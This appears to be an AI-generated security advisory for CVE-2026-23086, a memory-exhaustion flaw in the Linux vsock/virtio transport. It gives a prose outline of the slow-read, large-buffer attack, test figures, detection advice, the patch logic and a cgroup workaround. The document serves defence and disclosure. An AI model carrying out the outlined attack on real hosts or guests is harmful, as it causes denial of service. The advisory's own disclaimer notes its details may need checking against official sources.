CVE-2026-23086 Overview
A resource exhaustion vulnerability has been identified in the Linux kernel's vsock/virtio transport implementation. The vulnerability exists in how the virtio transport derives its TX credit directly from peer_buf_alloc, which is set from the remote endpoint's SO_VM_SOCKETS_BUFFER_SIZE value. This design flaw allows a malicious guest (or host) to advertise a large buffer and read slowly, forcing the other side to allocate a correspondingly large amount of sk_buff memory, potentially leading to system-wide memory exhaustion and denial of service.
Critical Impact
A malicious virtual machine guest can cause host memory exhaustion by advertising large buffer sizes through vsock connections, potentially leading to system instability or OOM conditions. The same attack is possible from a malicious host targeting guest systems.
Affected Products
- Linux kernel with virtio-vsock transport
- Linux kernel with vhost-vsock transport
- Linux kernel vsock loopback implementation
Discovery Timeline
- 2026-02-04 - CVE CVE-2026-23086 published to NVD
- 2026-02-05 - Last updated in NVD database
Technical Details for CVE-2026-23086
Vulnerability Analysis
The vulnerability resides in the virtio_transport_common.c component of the Linux kernel, which handles vsock communication between virtual machines and their hosts. The core issue is that the TX (transmit) credit mechanism relies entirely on the remote peer's advertised buffer size (peer_buf_alloc) without considering local buffer constraints.
When a remote endpoint (such as a guest VM) advertises an extremely large buffer size via SO_VM_SOCKETS_BUFFER_SIZE, the local endpoint (host) will queue data up to that advertised limit. If the remote endpoint then reads slowly or stops reading entirely, the local endpoint accumulates sk_buff allocations proportional to the peer's advertised buffer—not its own local policy.
In documented testing on an unpatched Ubuntu 22.04 host with approximately 64 GiB of RAM, a proof-of-concept using 32 guest vsock connections—each advertising 2 GiB buffers while reading slowly—drove Slab/SUnreclaim memory from approximately 0.5 GiB to 57 GiB. The system only recovered after the QEMU process was terminated.
Root Cause
The root cause is the absence of local buffer size constraints when calculating TX credits in the virtio vsock transport. The peer_buf_alloc value is accepted at face value from the remote endpoint without being bounded by the local system's own vsock buffer configuration (buf_alloc and buffer_max_size). This violates the principle that a remote peer should not be able to force resource allocation beyond what local policy permits.
Other vsock transports (VMCI and Hyper-V) already implement this boundary correctly—VMCI sizes queue pairs based on local vsk->buffer_* values, and Hyper-V uses fixed-size VMBus ring buffers that cannot be enlarged by remote peers.
Attack Vector
The attack can be executed by any entity with vsock communication access to the target system. In a typical virtualization environment:
- A malicious guest VM establishes multiple vsock connections to the host
- Each connection advertises an extremely large buffer size (e.g., 2 GiB per connection)
- The host begins transmitting data, queuing up to the advertised limits
- The guest intentionally reads slowly or stops reading
- The host accumulates massive sk_buff allocations in kernel slab memory
- With enough connections, this exhausts available host memory, causing system instability or OOM conditions
The attack is bidirectional—a malicious host can similarly target guest systems using the same technique, as virtio transports share the same code base.
Detection Methods for CVE-2026-23086
Indicators of Compromise
- Unusual growth in kernel slab memory (Slab and SUnreclaim in /proc/meminfo)
- High memory consumption associated with QEMU or other hypervisor processes
- Multiple vsock connections with unusually large advertised buffer sizes
- System memory pressure warnings without corresponding userspace memory growth
Detection Strategies
- Monitor /proc/meminfo for abnormal increases in Slab and SUnreclaim values
- Track vsock connection counts and buffer size negotiations in kernel logs
- Implement memory cgroup limits on virtualization processes to contain potential abuse
- Use kernel tracing tools to monitor virtio_transport_common.c function calls
Monitoring Recommendations
- Set up alerts for rapid kernel memory growth patterns
- Monitor hypervisor process memory consumption with defined thresholds
- Implement host-based intrusion detection for unusual vsock activity patterns
- Review guest VM behavior for slow-read or connection-stacking patterns
How to Mitigate CVE-2026-23086
Immediate Actions Required
- Apply the kernel patches from the official Linux kernel git repository
- Configure memory cgroups to limit QEMU/hypervisor process memory usage
- Review and reduce buffer_max_size vsock settings where possible
- Monitor systems for signs of exploitation while patches are deployed
Patch Information
The vulnerability has been addressed through multiple kernel commits that introduce a new helper function, virtio_transport_tx_buf_size(), which returns min(peer_buf_alloc, buf_alloc). This ensures the effective TX window is bounded by both the peer's advertised buffer and the local buf_alloc (already clamped to buffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE).
Patches are available from the official kernel git repository:
- Kernel Git Commit 84ef86aa
- Kernel Git Commit 8ee784fd
- Kernel Git Commit c0e42fb0
- Kernel Git Commit d9d5f222
With the patch applied, testing showed only approximately 35 MiB increase in Slab/SUnreclaim under the same attack conditions that previously consumed 56+ GiB.
Workarounds
- Apply memory cgroup limits to hypervisor processes to cap maximum memory consumption
- Reduce SO_VM_SOCKETS_BUFFER_MAX_SIZE on host systems to limit maximum queue sizes
- Restrict vsock access to trusted guests only where possible
- Monitor and alert on unusual memory consumption patterns in virtualization environments
# Configuration example - Limit QEMU memory with cgroups
# Create a cgroup for QEMU processes
mkdir -p /sys/fs/cgroup/memory/qemu
# Set memory limit (e.g., 8GB)
echo 8589934592 > /sys/fs/cgroup/memory/qemu/memory.limit_in_bytes
# Add QEMU process to cgroup
echo $QEMU_PID > /sys/fs/cgroup/memory/qemu/cgroup.procs
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


